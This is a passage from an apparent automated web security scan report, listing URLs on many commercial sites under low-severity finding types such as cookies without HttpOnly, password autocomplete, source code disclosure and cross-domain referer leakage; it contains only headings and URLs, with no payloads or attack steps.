13.35. http://bcp.crwdcntrl.net/4/c=73%7Crand=653530971%7Cpv=y%7Crt=ifr

13.36. http://bcp.crwdcntrl.net/4/c=73%7Crand=844124749%7Cpv=y%7Crt=ifr

13.37. http://bh.contextweb.com/bh/rtset

13.38. http://bp.specificclick.net/

13.39. http://c.atdmt.com/c.gif

13.40. http://c.bing.com/c.gif

13.41. http://c.microsoft.com/trans_pixel.asp

13.42. http://cdnt.meteorsolutions.com/api/setid

13.43. http://cdnt.meteorsolutions.com/api/track

13.44. http://clk.atdmt.com/goiframe/213439054/340524297/direct/01

13.45. http://clk.specificclick.net/click/v=5

13.46. http://d.agkn.com/pixel!t=650!

13.47. http://ehg-aaa.hitbox.com/HG

13.48. http://g-pixel.invitemedia.com/gmatcher

13.49. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071926901/

13.50. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071926901/

13.51. http://ib.adnxs.com/getuid

13.52. http://ib.adnxs.com/mapuid

13.53. http://ib.adnxs.com/ptj

13.54. http://ib.adnxs.com/px

13.55. http://ib.adnxs.com/pxj

13.56. http://ib.adnxs.com/seg

13.57. http://id.google.com/verify/EAAAAPoodblGem1K2ILpk5pXG1k.gif

13.58. http://id.google.com/verify/EAAAAPqcMfXpe6-gkMVmI3CbcjA.gif

13.59. http://idcs.interclick.com/Segment.aspx

13.60. http://image2.pubmatic.com/AdServer/Pug

13.61. http://images.apple.com/global/nav/scripts/globalnav.js

13.62. http://images.apple.com/global/nav/styles/navigation.css

13.63. http://images.apple.com/global/scripts/apple_core.js

13.64. http://images.apple.com/global/scripts/browserdetect.js

13.65. http://images.apple.com/global/scripts/content_swap.js

13.66. http://images.apple.com/global/scripts/lib/event_mixins.js

13.67. http://images.apple.com/global/scripts/lib/prototype.js

13.68. http://images.apple.com/global/scripts/lib/scriptaculous.js

13.69. http://images.apple.com/global/scripts/overlay_panel.js

13.70. http://images.apple.com/global/scripts/search_decorator.js

13.71. http://images.apple.com/global/scripts/swap_view.js

13.72. http://images.apple.com/global/scripts/view_master_tracker.js

13.73. http://images.apple.com/macpro/scripts/pagenav.js

13.74. http://images.apple.com/macpro/scripts/performance.js

13.75. http://js.revsci.net/gateway/gw.js

13.76. http://m.adnxs.com/msftcookiehandler

13.77. http://maps.google.com/maps

13.78. http://media.fastclick.net/w/tre

13.79. http://odb.outbrain.com/utils/get

13.80. http://p.brilig.com/contact/bct

13.81. http://pix04.revsci.net/C07583/b3/0/3/1008211/494237794.js

13.82. http://pix04.revsci.net/D08734/a1/0/3/0.js

13.83. http://pixel.quantserve.com/pixel

13.84. http://pixel.rubiconproject.com/di.php

13.85. http://pixel.rubiconproject.com/tap.php

13.86. http://profile.live.com/badge

13.87. http://r.turn.com/server/pixel.htm

13.88. http://r1-ads.ace.advertising.com/site=808880/size=300250/u=2/bnum=14768994/hr=15/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=0/aolexp=0/dref=http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue

13.89. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1113671950/SPONSOR/boston/default/empty.gif/726348573830334b61734941426a4977

13.90. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1462300313/INTRO/boston/default/empty.gif/726348573830334b61734941426a4977

13.91. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/346633134/BILLBOARD/boston/default/empty.gif/726348573830334b61734941426a4977

13.92. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1268261386/LOGO1/boston/bw_house_HIGHLIGHT/651651421411002.html/726348573830334b61734941426a4977

13.93. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1370466985/HEADLINE2/boston/m_livenat061311_bchm_HEADLINE2/0615_SummerComcast_234.jpg/726348573830334b61734941426a4977

13.94. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1374996851/CENTRAL/boston/m_fallon070611_bchm_BIGAD/300x250_bchm_070611-fallon.html/726348573830334b61734941426a4977

13.95. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/142449885/LOGO5/boston/m_dunkin020111_bchm_SPONSOR/dunkin_yt_logo100x40.jpg/726348573830334b61734941426a4977

13.96. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1489951529/HEADLINE1/boston/t_mspca071911_bchm_HEADLINE/234x60_bchm_071911-mspca.html/726348573830334b61734941426a4977

13.97. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1687713133/TILE1/boston/g_globeshoplocal051311_bchm_TILE/shoplocal040510_bchm_TILE.html/726348573830334b61734941426a4977

13.98. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/214936665/TOP/boston/c_colonialniss071911_clst_LEADER/colonial_nissan_071511_lb.jpg/726348573830334b61734941426a4977

13.99. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/407535735/LOGO9/boston/c_herbcham0311_bchm_LOGO/hc_toyota_062411_video_sponsor_ad.jpg/726348573830334b61734941426a4977

13.100. http://rmedia.boston.com/RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5

13.101. http://rover.ebay.com/rover/1/711-53200-19255-0/1

13.102. http://rover.ebay.com/roverimp/0/0/14

13.103. http://rover.ebay.com/roversync/

13.104. http://rt.legolas-media.com/lgrt

13.105. http://s.stubhubstatic.com/resources/mojito/js/lib/TeaLeaf.bundle.201104062011.min.js

13.106. http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/realnetworks-43000165.png

13.107. http://secure.adnxs.com/seg

13.108. http://sitelife.boston.com/ver1.0/Direct/Jsonp

13.109. http://sitelife.boston.com/ver1.0/Stats/Tracker.gif

13.110. http://srx.main.ebayrtm.com/rtm

13.111. https://ssl.bing.com/travel/secure/account/overview

13.112. http://tags.bluekai.com/site/2731

13.113. http://tags.bluekai.com/site/450

13.114. http://tap.rubiconproject.com/oz/feeds/targus/profile

13.115. http://tap.rubiconproject.com/oz/sensor

13.116. http://video.msn.com/services/user/info

13.117. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route

13.118. http://www.burstnet.com/enlightn/7117//930F/

13.119. http://www.burstnet.com/enlightn/7121//7128/

13.120. http://www.burstnet.com/enlightn/7177//7F4D/

13.121. http://www.facebook.com/advertising/

13.122. http://www.facebook.com/ajax/intl/language_dialog.php

13.123. http://www.facebook.com/ajax/prefetch.php

13.124. http://www.facebook.com/badges

13.125. http://www.facebook.com/badges/

13.126. http://www.facebook.com/campaign/landing.php

13.127. http://www.facebook.com/careers/

13.128. http://www.facebook.com/directory/pages/

13.129. http://www.facebook.com/directory/people/

13.130. http://www.facebook.com/facebook

13.131. http://www.facebook.com/find-friends

13.132. http://www.facebook.com/help/

13.133. http://www.facebook.com/mobile

13.134. http://www.facebook.com/mobile/

13.135. http://www.facebook.com/pages/create.php

13.136. http://www.facebook.com/privacy/explanation.php

13.137. http://www.facebook.com/r.php

13.138. http://www.facebook.com/terms.php

13.139. http://www.gamehouse.com/images/subsidiary.png

13.140. http://www.gamestop.com/Recommendations.axd

13.141. http://www.stubhub.com/TeaLeafTarget.html

13.142. http://www.stubhub.com/assets/default.css

13.143. http://www.stubhub.com/content/getPromoContent

13.144. http://www.stubhub.com/favicon.ico

13.145. http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-dhtml-popup.js

13.146. http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-dhtml.css

13.147. http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-surveydef.js

13.148. http://www.stubhub.com/resources/mojito/img/common/welcome_banner.gif

13.149. http://www.ticketmaster.com/json/menu

13.150. http://www.ticketmaster.com/json/search/genremenu

14. Cookie without HttpOnly flag set

14.1. http://c.microsoft.com/trans_pixel.aspx

14.2. http://investor.realnetworks.com/

14.3. http://investor.realnetworks.com/stockquote.cfm

14.4. http://rac.custhelp.com/

14.5. http://rac.custhelp.com/app/answers/detail/a_id/567/session/L3NpZC9QZkFqRm96aw%3D%3D

14.6. http://real.custhelp.com/app/answers/detail/a_id/9058/session/L3NpZC84dWtpRm96aw%3D%3D

14.7. http://sales.liveperson.net/visitor/addons/deploy.asp

14.8. https://signin.ebay.com/ws/eBayISAPI.dll

14.9. http://superpass.custhelp.com/

14.10. http://superpass.custhelp.com/app/answers/detail/a_id/8866/session/L3NpZC9TeU9pRm96aw%3D%3D

14.11. https://support.discoverbing.com/LTS/default.aspx

14.12. http://support.gamehouse.com/

14.13. http://support.gamehouse.com/app/answers/detail/a_id/861/

14.14. http://support.gamehouse.com/app/answers/list/c/188,624/catname/Game%20issues/session/L3NpZC9GZUNoRm96aw%3D%3D

14.15. http://support.gamehouse.com/app/contact

14.16. http://t.mookie1.com/t/v1/event

14.17. http://www.gamehouse.com/images/subsidiary.png

14.18. http://www.stubhub.com/

14.19. http://a.netmng.com/hic/

14.20. http://a.tribalfusion.com/j.ad

14.21. http://ad.yieldmanager.com/pixel

14.22. http://ad.yieldmanager.com/unpixel

14.23. http://admeld.lucidmedia.com/clicksense/admeld/match

14.24. http://ads.as4x.tmcs.ticketmaster.com/js.ng/site=tm&pagepos=3002&adsize=422x40&Params.lifetime=30&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&brand=0&eventid=000043582C516D43

14.25. http://ads.as4x.tmcs.ticketmaster.com/js.ng/site=tm&pagepos=3004&adsize=422x30&Params.lifetime=30&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&brand=0&eventid=000043582C516D43

14.26. http://ads.revsci.net/adserver/ako

14.27. http://ads.undertone.com/fc.php

14.28. http://ads.undertone.com/l

14.29. http://api.choicestream.com/instr/api/8e360375d27a5381/a1

14.30. http://b.scorecardresearch.com/b

14.31. http://b.scorecardresearch.com/p

14.32. http://b.scorecardresearch.com/r

14.33. http://b3.mookie1.com/2/ticketmaster/minorcat/1/11408426983@x02

14.34. http://bcp.crwdcntrl.net/4/c=520|rand=478684930|pv=y|rt=ifr

14.35. http://bcp.crwdcntrl.net/4/c=73%7Crand=355761333%7Cpv=y%7Crt=ifr

14.36. http://bcp.crwdcntrl.net/4/c=73%7Crand=420299861%7Cpv=y%7Crt=ifr

14.37. http://bcp.crwdcntrl.net/4/c=73%7Crand=653530971%7Cpv=y%7Crt=ifr

14.38. http://bcp.crwdcntrl.net/4/c=73%7Crand=844124749%7Cpv=y%7Crt=ifr

14.39. http://bh.contextweb.com/bh/rtset

14.40. http://bing.com/

14.41. http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669

14.42. http://bp.specificclick.net/

14.43. http://c.atdmt.com/c.gif

14.44. http://c.bing.com/c.gif

14.45. http://c.microsoft.com/trans_pixel.asp

14.46. http://cdnt.meteorsolutions.com/api/setid

14.47. http://cdnt.meteorsolutions.com/api/track

14.48. http://clk.atdmt.com/goiframe/213439054/340524297/direct/01

14.49. http://clk.specificclick.net/click/v=5

14.50. http://d.agkn.com/pixel!t=650!

14.51. http://de.ign.com/js.ng/size=728x90&network=tpn&property=gamestop&dechannel=gs_home&pagetype=gs_channel

14.52. http://ehg-aaa.hitbox.com/HG

14.53. http://g-pixel.invitemedia.com/gmatcher

14.54. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071926901/

14.55. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071926901/

14.56. http://homepage.mac.com/jstg674/Sites/iSale/Pictures/1310686170_0.jpg

14.57. http://homepage.mac.com/jstg674/Sites/iSale/Pictures/1310686178_1.jpg

14.58. http://idcs.interclick.com/Segment.aspx

14.59. http://image2.pubmatic.com/AdServer/Pug

14.60. http://images.apple.com/global/nav/scripts/globalnav.js

14.61. http://images.apple.com/global/nav/styles/navigation.css

14.62. http://images.apple.com/global/scripts/apple_core.js

14.63. http://images.apple.com/global/scripts/browserdetect.js

14.64. http://images.apple.com/global/scripts/content_swap.js

14.65. http://images.apple.com/global/scripts/lib/event_mixins.js

14.66. http://images.apple.com/global/scripts/lib/prototype.js

14.67. http://images.apple.com/global/scripts/lib/scriptaculous.js

14.68. http://images.apple.com/global/scripts/overlay_panel.js

14.69. http://images.apple.com/global/scripts/search_decorator.js

14.70. http://images.apple.com/global/scripts/swap_view.js

14.71. http://images.apple.com/global/scripts/view_master_tracker.js

14.72. http://images.apple.com/macpro/scripts/pagenav.js

14.73. http://images.apple.com/macpro/scripts/performance.js

14.74. http://internetdc.bnymellon.com/dcscqt3z310000c9vrxqgfz0d_7c2w/dcs.gif

14.75. http://js.revsci.net/gateway/gw.js

14.76. http://lct.salesforce.com/sfga.js

14.77. https://login.live.com/login.srf

14.78. http://m.webtrends.com/dcsk730ac00000w4taqdiehjf_4b7y/dcs.gif

14.79. http://m.webtrends.com/dcsxia05c00000s926v0z4tru_3w4l/dcs.gif

14.80. http://majornelson.com/gamercard/index.php

14.81. http://maps.google.com/maps

14.82. http://media.fastclick.net/w/tre

14.83. http://mobileweb.ebay.com/

14.84. http://odb.outbrain.com/utils/get

14.85. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx

14.86. http://onlinehelp.microsoft.com/en-us/bing/ff808415.aspx

14.87. http://onlinehelp.microsoft.com/en-us/bing/ff808465.aspx

14.88. http://onlinehelp.microsoft.com/en-us/bing/ff808483.aspx

14.89. http://onlinehelp.microsoft.com/en-us/bing/ff808490.aspx

14.90. http://onlinehelp.microsoft.com/en-us/bing/ff808492.aspx

14.91. http://onlinehelp.microsoft.com/en-us/bing/ff808506.aspx

14.92. http://onlinehelp.microsoft.com/en-us/bing/ff808522.aspx

14.93. http://onlinehelp.microsoft.com/en-us/bing/ff919207.aspx

14.94. http://onlinehelp.microsoft.com/en-us/bing/gg276362.aspx

14.95. http://p.brilig.com/contact/bct

14.96. http://pix04.revsci.net/C07583/b3/0/3/1008211/494237794.js

14.97. http://pix04.revsci.net/D08734/a1/0/3/0.js

14.98. http://pixel.quantserve.com/pixel

14.99. http://pixel.rubiconproject.com/di.php

14.100. http://pixel.rubiconproject.com/tap.php

14.101. http://profile.live.com/badge

14.102. http://r.turn.com/server/pixel.htm

14.103. http://r1-ads.ace.advertising.com/site=808880/size=300250/u=2/bnum=14768994/hr=15/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=0/aolexp=0/dref=http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue

14.104. http://realnetworksrealarca.tt.omtrdc.net/m2/realnetworksrealarca/mbox/standard

14.105. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1113671950/SPONSOR/boston/default/empty.gif/726348573830334b61734941426a4977

14.106. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1462300313/INTRO/boston/default/empty.gif/726348573830334b61734941426a4977

14.107. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/346633134/BILLBOARD/boston/default/empty.gif/726348573830334b61734941426a4977

14.108. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1268261386/LOGO1/boston/bw_house_HIGHLIGHT/651651421411002.html/726348573830334b61734941426a4977

14.109. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1370466985/HEADLINE2/boston/m_livenat061311_bchm_HEADLINE2/0615_SummerComcast_234.jpg/726348573830334b61734941426a4977

14.110. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1374996851/CENTRAL/boston/m_fallon070611_bchm_BIGAD/300x250_bchm_070611-fallon.html/726348573830334b61734941426a4977

14.111. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/142449885/LOGO5/boston/m_dunkin020111_bchm_SPONSOR/dunkin_yt_logo100x40.jpg/726348573830334b61734941426a4977

14.112. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1489951529/HEADLINE1/boston/t_mspca071911_bchm_HEADLINE/234x60_bchm_071911-mspca.html/726348573830334b61734941426a4977

14.113. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1687713133/TILE1/boston/g_globeshoplocal051311_bchm_TILE/shoplocal040510_bchm_TILE.html/726348573830334b61734941426a4977

14.114. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/214936665/TOP/boston/c_colonialniss071911_clst_LEADER/colonial_nissan_071511_lb.jpg/726348573830334b61734941426a4977

14.115. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/407535735/LOGO9/boston/c_herbcham0311_bchm_LOGO/hc_toyota_062411_video_sponsor_ad.jpg/726348573830334b61734941426a4977

14.116. http://rmedia.boston.com/RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5

14.117. http://rover.ebay.com/rover/1/711-53200-19255-0/1

14.118. http://rover.ebay.com/roverimp/0/0/14

14.119. http://rover.ebay.com/roversync/

14.120. http://rt.legolas-media.com/lgrt

14.121. http://s.stubhubstatic.com/resources/mojito/js/lib/TeaLeaf.bundle.201104062011.min.js

14.122. http://sales.liveperson.net/hc/21661174/

14.123. http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/realnetworks-43000165.png

14.124. http://sitelife.boston.com/ver1.0/Direct/Jsonp

14.125. http://sitelife.boston.com/ver1.0/Stats/Tracker.gif

14.126. http://srx.main.ebayrtm.com/rtm

14.127. https://ssl.bing.com/travel/secure/account/overview

14.128. http://statse.webtrendslive.com/dcs2jv4o900000oa88gtwa3au_6v2h/dcs.gif

14.129. https://support.discoverbing.com/Default.aspx

14.130. http://t2.trackalyzer.com/trackalyze.asp

14.131. http://tags.bluekai.com/site/2731

14.132. http://tags.bluekai.com/site/450

14.133. http://tap.rubiconproject.com/oz/feeds/targus/profile

14.134. http://tap.rubiconproject.com/oz/sensor

14.135. http://video.msn.com/services/user/info

14.136. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route

14.137. http://www.adminitrack.com/

14.138. http://www.burstnet.com/enlightn/7117//930F/

14.139. http://www.burstnet.com/enlightn/7121//7128/

14.140. http://www.burstnet.com/enlightn/7177//7F4D/

14.141. http://www.clickmanage.com/events/clickevent.aspx

14.142. http://www.facebook.com/advertising/

14.143. http://www.facebook.com/badges/

14.144. http://www.facebook.com/careers/

14.145. http://www.facebook.com/directory/pages/

14.146. http://www.facebook.com/directory/people/

14.147. http://www.facebook.com/facebook

14.148. http://www.facebook.com/find-friends

14.149. http://www.facebook.com/help/

14.150. http://www.facebook.com/mobile/

14.151. http://www.facebook.com/pages/create.php

14.152. http://www.facebook.com/privacy/explanation.php

14.153. http://www.fansnap.com/

14.154. http://www.fastteks.com.asp1-14.websitetestlink.com/css/styles.css

14.155. http://www.gamestop.com/

14.156. http://www.gamestop.com/Recommendations.axd

14.157. http://www.googleadservices.com/pagead/aclk

14.158. http://www.nne.aaa.com/en-nne/Pages/Home.aspx

14.159. http://www.stubhub.com/TeaLeafTarget.html

14.160. http://www.stubhub.com/assets/default.css

14.161. http://www.stubhub.com/content/getPromoContent

14.162. http://www.stubhub.com/favicon.ico

14.163. http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-dhtml-popup.js

14.164. http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-dhtml.css

14.165. http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-surveydef.js

14.166. http://www.stubhub.com/resources/mojito/img/common/welcome_banner.gif

14.167. http://www.ticketmaster.com/json/menu

14.168. http://www.ticketmaster.com/json/search/genremenu

15. Password field with autocomplete enabled

15.1. http://digg.com/submit

15.2. http://forum.redbyte.ro/

15.3. http://manager.linode.com/

15.4. https://signin.ebay.com/ws/eBayISAPI.dll

15.5. http://waypointlivingspaces.com/function.mysql-connect

15.6. http://waypointlivingspaces.com/locate-dealer

15.7. http://waypointlivingspaces.com/locate-dealer

15.8. http://waypointlivingspaces.com/locate-dealer

15.9. http://waypointlivingspaces.com/locate-dealer

15.10. http://waypointlivingspaces.com/user

15.11. http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html

15.12. http://www.facebook.com/advertising/

15.13. http://www.facebook.com/ajax/intl/language_dialog.php

15.14. http://www.facebook.com/badges/

15.15. http://www.facebook.com/careers/

15.16. http://www.facebook.com/directory/pages/

15.17. http://www.facebook.com/directory/people/

15.18. http://www.facebook.com/facebook

15.19. http://www.facebook.com/find-friends

15.20. http://www.facebook.com/help/

15.21. http://www.facebook.com/mobile/

15.22. http://www.facebook.com/pages/create.php

15.23. http://www.facebook.com/privacy/explanation.php

15.24. http://www.facebook.com/r.php

15.25. http://www.facebook.com/r.php

15.26. http://www.facebook.com/terms.php

15.27. http://www.livedrive.com/SignupToLivedrive

15.28. http://www.myspace.com/auth/loginform

15.29. http://www.nne.aaa.com/en-nne/Pages/Home.aspx

16. Source code disclosure

16.1. http://bing.fansnap.com/ejs_templates/seats_page/known_tooltip.ejs

16.2. http://bing.fansnap.com/ejs_templates/seats_page/ticket_sets/new_base/marker/photo_sec_none.ejs

16.3. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js

16.4. http://cdn-1.fansnap.com/REL-fansnap-1.20.2-r31787/javascripts/bundle2.js

16.5. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js

16.6. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js

16.7. http://www.seapine.com/ttpro.html

17. ASP.NET debugging enabled

18. Referer-dependent response

18.1. http://bing.fansnap.com/checkout/index/415814268

18.2. http://bing.fansnap.com/checkout/index/418563179

18.3. http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669

18.4. http://feeds.feedburner.com/netsparker

18.5. http://support.microsoft.com/contactus/cu_sc_prodact_master

18.6. http://support.microsoft.com/gp/csa

18.7. http://vimeo.com/moogaloop.swf

18.8. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route

18.9. http://www.facebook.com/plugins/activity.php

18.10. http://www.facebook.com/plugins/like.php

18.11. http://www.facebook.com/plugins/likebox.php

18.12. http://www.fansnap.com/developers

18.13. http://www.microsoft.com/worldwide/

18.14. http://www.youtube.com/v/JmxL5BlVzZQ

18.15. http://www.youtube.com/v/LpBCsQQ_v0U&autoplay=1

18.16. http://www.youtube.com/v/O3iZU0WCuwc&autoplay=1

18.17. http://www.youtube.com/v/QO6L5AtZ5kE&autoplay=1

18.18. http://www.youtube.com/v/tYy3w4lIafA&autoplay=1

19. Cross-domain POST

19.1. http://www.atlassian.com/software/fisheye/

19.2. http://www.atlassian.com/software/greenhopper/

19.3. http://www.atlassian.com/software/jira/

19.4. http://www.atlassian.com/software/jira/pricing.jsp

19.5. http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx

19.6. http://www.mavitunasecurity.com/

20. Cross-domain Referer leakage

20.1. http://a.netmng.com/hic/

20.2. http://a.tribalfusion.com/j.ad

20.3. http://a.tribalfusion.com/j.ad

20.4. http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127

20.5. http://ad.doubleclick.net/adj/gamesco.gh/home/w

20.6. http://admeld.adnxs.com/usersync

20.7. http://admeld.lucidmedia.com/clicksense/admeld/match

20.8. http://answers.microsoft.com/en-us/Forum/ForumThreadList

20.9. http://answers.microsoft.com/en-us/Site/StartSignIn

20.10. http://answers.microsoft.com/en-us/Site/StartSignIn

20.11. http://answers.microsoft.com/en-us/User/UserThreadList

20.12. http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01

20.13. http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01

20.14. http://bcp.crwdcntrl.net/px

20.15. http://bing.fansnap.com/checkout/clickout/415814268

20.16. http://bing.fansnap.com/checkout/clickout/418563179

20.17. http://bing.fansnap.com/checkout/clickout/418563179

20.18. http://bing.fansnap.com/checkout/index/415814268

20.19. http://bing.fansnap.com/checkout/index/418563179

20.20. http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669

20.21. http://bp.specificclick.net/

20.22. http://cache.boston.com/universal/js/twitterwidget.js

20.23. http://cc.bingj.com/cache.aspx

20.24. http://clk.specificclick.net/click/v=5

20.25. http://cm.g.doubleclick.net/pixel

20.26. http://cm.g.doubleclick.net/pixel

20.27. http://cm.g.doubleclick.net/pixel

20.28. http://cm.g.doubleclick.net/pixel

20.29. http://developers.facebook.com/

20.30. http://digg.com/submit

20.31. http://googleads.g.doubleclick.net/pagead/ads

20.32. http://ib.adnxs.com/ptj

20.33. http://ib.adnxs.com/seg

20.34. http://mobile.ebay.com/wp-content/themes/platformpro/js/ticker_twitter.js

20.35. http://pixel.invitemedia.com/admeld_sync

20.36. http://rad.msn.com/ADSAdClient31.dll

20.37. http://rmedia.boston.com/RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5

20.38. https://signin.ebay.com/ws/eBayISAPI.dll

20.39. http://srx.main.ebayrtm.com/rtm

20.40. https://support.discoverbing.com/Default.aspx

20.41. http://support.microsoft.com/common/international.aspx

20.42. http://support.microsoft.com/contactus/contact_microsoft_customer_serv

20.43. http://support.microsoft.com/oas/default.aspx

20.44. https://support.microsoft.com/oas/default.aspx

20.45. http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228

20.46. http://umfcluj.ro/Detaliu.aspx

20.47. http://umfcluj.ro/lista.aspx

20.48. http://umfcluj.ro/lista.aspx

20.49. http://umfcluj.ro/lista.aspx

20.50. http://umfcluj.ro/lista.aspx

20.51. http://umfcluj.ro/lista.aspx

20.52. http://umfcluj.ro/lista.aspx

20.53. http://umfcluj.ro/search.aspx

20.54. http://waypointlivingspaces.com/locate-dealer

20.55. http://www.adminitrack.com/

20.56. http://www.axosoft.com/lp/ga/bug-tracking-software/

20.57. http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html

20.58. http://www.clickmanage.com/events/clickevent.aspx

20.59. http://www.discoverbing.com/dbing/community.axd

20.60. http://www.facebook.com/advertising/

20.61. http://www.facebook.com/ajax/intl/language_dialog.php

20.62. http://www.facebook.com/ajax/prefetch.php

20.63. http://www.facebook.com/ajax/prefetch.php

20.64. http://www.facebook.com/badges/

20.65. http://www.facebook.com/careers/

20.66. http://www.facebook.com/find-friends

20.67. http://www.facebook.com/help/

20.68. http://www.facebook.com/mobile/

20.69. http://www.facebook.com/pages/create.php

20.70. http://www.facebook.com/plugins/activity.php

20.71. http://www.facebook.com/plugins/like.php

20.72. http://www.facebook.com/plugins/likebox.php

20.73. http://www.facebook.com/plugins/likebox.php

20.74. http://www.facebook.com/terms.php

20.75. http://www.fastteks.com/TechSolutions/Contact-Us.aspx

20.76. http://www.google.com/search

20.77. http://www.google.com/search

20.78. http://www.google.com/search

20.79. http://www.google.com/search

20.80. http://www.google.com/search

20.81. http://www.google.com/search

20.82. http://www.google.com/url

20.83. http://www.google.com/url

20.84. http://www.googleadservices.com/pagead/conversion/1036609180/

20.85. http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx

20.86. http://www.livedrive.com/SignupToLivedrive

20.87. http://www.myspace.com/auth/loginform

20.88. http://www.nne.aaa.com/en-nne/Pages/Home.aspx

20.89. http://www.numarasoftware.com/welcome/service_desk.aspx

20.90. http://www.seapine.com/ttpro.html

20.91. http://www.stubhub.com/

20.92. http://www.stumbleupon.com/submit

20.93. http://www.techexcel.com/products/devsuite/devteststudio.html

20.94. http://www.ticketmaster.com/event/000043582C516D43

21. Cross-domain script include

21.1. http://a.netmng.com/hic/

21.2. http://a.tribalfusion.com/j.ad

21.3. http://a.tribalfusion.com/j.ad

21.4. http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127

